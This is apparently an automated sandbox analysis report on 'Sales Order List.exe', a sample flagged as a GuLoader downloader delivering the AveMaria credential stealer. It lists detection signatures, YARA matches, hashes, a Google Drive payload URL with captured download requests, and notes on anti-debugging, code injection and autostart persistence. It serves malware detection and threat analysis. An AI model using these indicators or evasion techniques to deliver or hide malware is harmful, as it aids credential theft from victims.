Windows Analysis Report Sales Order List.exe

Overview

General Information

Sample Name: Sales Order List.exe
Analysis ID: 526595
MD5: 80bad0903ee7ec98805678673720cfd9
SHA1: 35aecf6fe3ac24adaf16c04b787e90ac4c845eb0
SHA256: 260e6b75d7616efd29c05151f1ce95bbab1aaf8703f86f62c4d9bc6d308a56b8

Detection

GuLoader AveMaria
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection:

Found malware configuration
Source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloads;R"}
Multi AV Scanner detection for submitted file
Source: Sales Order List.exe ReversingLabs: Detection: 40%
Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\images.exe ReversingLabs: Detection: 40%
Antivirus or Machine Learning detection for unpacked file
Source: 4.3.Sales Order List.exe.18f3e10.7.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 4.3.Sales Order List.exe.18f3e10.3.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Uses 32bit PE files
Source: Sales Order List.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: C:\Users\user\Desktop\Sales Order List.exe Directory created: C:\Program Files\Microsoft DN1
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=downloads;R
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.184.220.29 93.184.220.29
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000000B.00000002.130410544642.000000000CFBC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000B.00000002.130410016644.000000000CF7B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000B.00000000.125786547597.000000000A940000.00000002.00020000.sdmp String found in binary or memory: http://schemas.micro
Source: Sales Order List.exe String found in binary or memory: http://topqualityfreeware.com
Source: Amcache.hve.LOG1.20.dr String found in binary or memory: http://upx.sf.net
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: http://www.foreca.com
Source: Sales Order List.exe String found in binary or memory: http://www.topqualityfreeware.com/
Source: explorer.exe, 0000000B.00000002.130415876105.0000000010478000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
Source: explorer.exe, 0000000B.00000000.125824449017.0000000002E75000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/odirme
Source: explorer.exe, 0000000B.00000002.130409357270.000000000CEEE000.00000004.00000001.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000B.00000000.125824045068.0000000002E1A000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000B.00000002.130406454585.000000000CBA2000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000B.00000000.125782425758.00000000093FE000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?P
Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivations
Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Sales Order List.exe String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
Source: Sales Order List.exe, 00000004.00000003.125871810697.0000000001879000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/7
Source: Sales Order List.exe, 00000004.00000003.125871877283.0000000001883000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/S~
Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5i
Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/w
Source: Sales Order List.exe, 00000004.00000003.125871692204.0000000001870000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/
Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/4
Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnY
Source: Sales Order List.exe, 00000004.00000003.125743205436.00000000018AE000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnawmvg8FJU4CwcICFY
Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnc
Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.comn
Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmp String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp String found in binary or memory: https://outlook.comows.CB
Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmp String found in binary or memory: https://powerpoint.office.com8
Source: WerFault.exe, 00000014.00000003.125950197304.0000000002D61000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemet
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000B.00000002.130416256186.00000000104AE000.00000004.00000001.sdmp String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000B.00000002.130414430727.0000000010370000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehpA
Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpU
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: WerFault.exe, 00000014.00000003.125903793452.0000000002D9E000.00000004.00000001.sdmp Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
Installs a raw input device (often for capturing keystrokes)
Source: Sales Order List.exe Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Sales Order List.exe
Uses 32bit PE files
Source: Sales Order List.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
One or more processes crash
Source: C:\ProgramData\images.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
Detected potential crypto function
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1E3D 2_2_022E1E3D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED671 2_2_022ED671
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F6B37 2_2_022F6B37
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDBA3 2_2_022EDBA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED01F 2_2_022ED01F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E3D31 2_2_022E3D31
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC22A 2_2_022EC22A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E4279 2_2_022E4279
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAE56 2_2_022EAE56
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E42A5 2_2_022E42A5
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAAA3 2_2_022EAAA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EA68C 2_2_022EA68C
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EE295 2_2_022EE295
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EA691 2_2_022EA691
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC2E4 2_2_022EC2E4
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBADD 2_2_022EBADD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E2ED9 2_2_022E2ED9
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E12D4 2_2_022E12D4
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBED0 2_2_022EBED0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F2B30 2_2_022F2B30
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4F00 2_2_022F4F00
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB34D 2_2_022EB34D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB745 2_2_022EB745
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E5B99 2_2_022E5B99
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E9FE8 2_2_022E9FE8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC7CD 2_2_022EC7CD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBBD1 2_2_022EBBD1
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC024 2_2_022EC024
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED414 2_2_022ED414
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED079 2_2_022ED079
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB0C8 2_2_022EB0C8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED8D8 2_2_022ED8D8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC539 2_2_022EC539
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E2D33 2_2_022E2D33
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3D63 2_2_022F3D63
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB98D 2_2_022EB98D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBD85 2_2_022EBD85
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4993 2_2_022F4993
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB5E0 2_2_022EB5E0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED5FC 2_2_022ED5FC
Source: C:\ProgramData\images.exe Code function: 15_2_02346B37 15_2_02346B37
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBA3 15_2_0233DBA3
Source: C:\ProgramData\images.exe Code function: 15_2_02343D63 15_2_02343D63
Source: C:\ProgramData\images.exe Code function: 15_2_02334279 15_2_02334279
Source: C:\ProgramData\images.exe Code function: 15_2_023342A5 15_2_023342A5
Source: C:\ProgramData\images.exe Code function: 15_2_0233E295 15_2_0233E295
Source: C:\ProgramData\images.exe Code function: 15_2_023312D4 15_2_023312D4
Source: C:\ProgramData\images.exe Code function: 15_2_02342B30 15_2_02342B30
Source: C:\ProgramData\images.exe Code function: 15_2_02344F00 15_2_02344F00
Source: C:\ProgramData\images.exe Code function: 15_2_02339FE8 15_2_02339FE8
Source: C:\ProgramData\images.exe Code function: 15_2_02333FD5 15_2_02333FD5
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBDF 15_2_0233DBDF
Source: C:\ProgramData\images.exe Code function: 15_2_0233D01F 15_2_0233D01F
Source: C:\ProgramData\images.exe Code function: 15_2_02344993 15_2_02344993
Source: C:\ProgramData\images.exe Code function: 15_2_0233D5FC 15_2_0233D5FC
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDBA3 NtAllocateVirtualMemory, 2_2_022EDBA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED01F NtWriteVirtualMemory, 2_2_022ED01F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E3D31 NtWriteVirtualMemory,TerminateProcess, 2_2_022E3D31
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F6548 NtProtectVirtualMemory, 2_2_022F6548
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC22A NtWriteVirtualMemory, 2_2_022EC22A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDE40 NtAllocateVirtualMemory, 2_2_022EDE40
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAE56 NtWriteVirtualMemory, 2_2_022EAE56
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAAA3 NtWriteVirtualMemory, 2_2_022EAAA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC2E4 NtWriteVirtualMemory, 2_2_022EC2E4
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBADD NtWriteVirtualMemory, 2_2_022EBADD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBED0 NtWriteVirtualMemory, 2_2_022EBED0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4F00 NtWriteVirtualMemory,LoadLibraryA, 2_2_022F4F00
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB34D NtWriteVirtualMemory, 2_2_022EB34D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB745 NtWriteVirtualMemory, 2_2_022EB745
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC7CD NtWriteVirtualMemory, 2_2_022EC7CD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBBD1 NtWriteVirtualMemory, 2_2_022EBBD1
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC024 NtWriteVirtualMemory, 2_2_022EC024
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB0C8 NtWriteVirtualMemory, 2_2_022EB0C8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED8D8 NtAllocateVirtualMemory, 2_2_022ED8D8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC539 NtWriteVirtualMemory, 2_2_022EC539
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDD13 NtAllocateVirtualMemory, 2_2_022EDD13
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3D63 NtWriteVirtualMemory,LoadLibraryA, 2_2_022F3D63
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB98D NtWriteVirtualMemory, 2_2_022EB98D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBD85 NtWriteVirtualMemory, 2_2_022EBD85
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB5E0 NtWriteVirtualMemory, 2_2_022EB5E0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_0167834D Sleep,NtProtectVirtualMemory, 4_2_0167834D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_016780FC NtProtectVirtualMemory, 4_2_016780FC
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_01678529 NtProtectVirtualMemory, 4_2_01678529
